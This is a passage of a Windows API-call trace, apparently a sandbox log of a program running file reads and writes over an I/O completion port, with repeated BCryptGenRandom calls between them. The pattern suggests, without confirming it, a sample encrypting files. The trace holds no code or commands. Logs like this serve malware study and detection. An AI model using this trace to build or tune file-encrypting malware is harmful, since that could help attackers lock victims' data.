lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.588] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1234, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.589] CloseHandle (hObject=0x2a4) returned 1 [0179.589] free (_Block=0x3df0008) [0179.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.644] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.645] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0179.645] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.645] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0179.645] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.645] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.645] free (_Block=0x3e305b8) [0179.646] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.646] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.646] free (_Block=0x1fa91d0) [0179.646] free (_Block=0x1fa2ed8) [0179.646] free (_Block=0x1fa90b8) [0179.646] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.648] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x235c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.657] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.665] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0179.666] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.666] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0179.666] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.666] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.666] free (_Block=0x3e305b8) [0179.667] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.667] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.667] free (_Block=0x1fa91d0) [0179.667] free (_Block=0x1fa2ed8) [0179.667] free (_Block=0x1fa90b8) [0179.667] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.734] CloseHandle (hObject=0x2a8) returned 1 [0179.734] free (_Block=0x3df0008) [0179.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.743] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.750] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1361, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.770] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.771] CloseHandle (hObject=0x338) returned 1 [0179.771] free (_Block=0x3d70450) [0179.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.824] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0179.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.836] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.847] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.859] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.870] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.892] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1d3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.893] CloseHandle (hObject=0x2a4) returned 1 [0179.893] free (_Block=0x1ff1e60) [0179.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.900] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1af, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.901] CloseHandle (hObject=0x308) returned 1 [0179.901] free (_Block=0x3df0008) [0179.901] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.915] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.915] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0179.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.916] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0179.916] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.916] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.916] free (_Block=0x3e305b8) [0179.916] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.917] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.917] free (_Block=0x1fa91d0) [0179.917] free (_Block=0x1fa2ed8) [0179.917] free (_Block=0x1fa90b8) [0179.917] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.918] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.918] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.928] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.328] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ab, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.328] CloseHandle (hObject=0x308) returned 1 [0180.328] free (_Block=0x3df0008) [0180.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.335] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0180.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.335] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0180.335] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.336] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.336] free (_Block=0x3e305b8) [0180.336] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.336] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.336] free (_Block=0x1fa91d0) [0180.336] free (_Block=0x1fa2ed8) [0180.336] free (_Block=0x1fa90b8) [0180.336] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.337] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.342] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.354] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.363] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.372] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.381] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0180.434] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0180.434] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.434] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.435] free (_Block=0x3e305b8) [0180.435] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.435] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0180.435] free (_Block=0x1fa91d0) [0180.435] free (_Block=0x77d7a8) [0180.435] free (_Block=0x1fa90b8) [0180.435] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0180.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.460] CloseHandle (hObject=0x308) returned 1 [0180.463] free (_Block=0x1ff1e60) [0180.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.465] CloseHandle (hObject=0x2a8) returned 1 [0180.465] free (_Block=0x3e70008) [0180.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0180.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0180.484] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.484] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.485] free (_Block=0x3e305b8) [0180.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.485] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.485] free (_Block=0x1fa91d0) [0180.485] free (_Block=0x1fa2ed8) [0180.485] free (_Block=0x1fa90b8) [0180.485] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.487] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2080, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.489] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.845] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, 